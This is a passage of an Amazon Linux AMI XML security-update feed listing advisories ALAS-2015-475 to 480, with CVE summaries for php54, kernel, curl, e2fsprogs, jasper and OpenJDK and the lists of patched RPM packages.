arch="i686"><filename>Packages/php55-cli-5.5.21-1.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-475</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-475: medium priority package update for php54</title><issued date="2015-02-11 19:34:00" /><updated date="2015-02-11 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0232:
The exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.
1185472:
CVE-2015-0232 php: Free called on unitialized pointer in exif.c
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
CVE-2014-9427:
sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping.
1178736:
CVE-2014-9427 php: out of bounds read when parsing a crafted .php file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427" title="" id="CVE-2014-9427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232" title="" id="CVE-2015-0232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.37-1.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-476</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-476: medium priority package update for kernel</title><issued date="2015-02-11 19:34:00" /><updated date="2015-02-11 19:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8989:
The Linux kernel through 3.17.4 does not properly restrict dropping of supplemental group memberships in certain namespace scenarios, which allows local users to bypass intended file permissions by leveraging a POSIX ACL containing an entry for the group category that is more restrictive than the entry for the other category, aka a "negative groups" issue, related to kernel/groups.c, kernel/uid16.c, and kernel/user_namespace.c.
1170684:
CVE-2014-8989 kernel: Linux user namespaces can bypass group-based restrictions
CVE-2014-7822:
A flaw was found in the way the Linux kernel's splice() system call validated its parameters. On certain file systems, a local, unprivileged user could use this flaw to write past the maximum file size, and thus crash the system.
1163792:
CVE-2014-7822 kernel: splice: lack of generic write checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7822" title="" id="CVE-2014-7822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8989" title="" id="CVE-2014-8989" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.33" release="26.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.33-26.47.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-477</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-477: medium priority package update for curl</title><issued date="2015-02-11 19:36:00" /><updated date="2015-02-11 19:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8150:
CRLF injection vulnerability in libcurl 6.0 through 7.x before 7.40.0, when using an HTTP proxy, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in a URL.
1178692:
CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn()
CVE-2014-3707:
The curl_easy_duphandle function in libcurl 7.17.1 through 7.38.0, when running with the CURLOPT_COPYPOSTFIELDS option, does not properly copy HTTP POST data for an easy handle, which triggers an out-of-bounds read that allows remote web servers to read sensitive memory information.
1154941:
CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3707" title="" id="CVE-2014-3707" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8150" title="" id="CVE-2014-8150" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-478</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-478: medium priority package update for e2fsprogs</title><issued date="2015-02-11 19:36:00" /><updated date="2015-02-11 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0247:
A heap-based buffer overflow flaw was found in e2fsprogs. A specially crafted Ext2/3/4 file system could cause an application using the ext2fs library (for example, fsck) to crash or, possibly, execute arbitrary code.
1187032:
CVE-2015-0247 e2fsprogs: ext2fs_open2() missing first_meta_bg boundary check leading to heap buffer overflow (oCERT-015-002)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0247" title="" id="CVE-2015-0247" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="e2fsprogs-libs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libcom_err" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.42.12-1.34.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-static-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.42.12-1.34.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.42.12" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.42.12-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-479</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-479: important priority package update for jasper</title><issued date="2015-02-11 19:37:00" /><updated date="2015-02-11 19:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8158:
An unrestricted stack memory use flaw was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8157:
An off-by-one flaw, leading to a heap-based buffer overflow, was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8157" title="" id="CVE-2014-8157" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8158" title="" id="CVE-2014-8158" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0074.html" title="" id="RHSA-2015:0074" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-16.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-16.9.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-16.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-480</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-480: important priority package update for java-1.6.0-openjdk</title><issued date="2015-02-11 19:38:00" /><updated date="2015-02-11 19:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
A flaw was found in the way the Hotspot component in OpenJDK verified bytecode from the class files. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2014-6593:
It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-3566:
A flaw was found in the way the SSL 3.0 protocol handled padding bytes when decrypting messages that were encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw could possibly allow a man-in-the-middle (MITM) attacker to decrypt portions of the cipher text using a padding oracle attack.
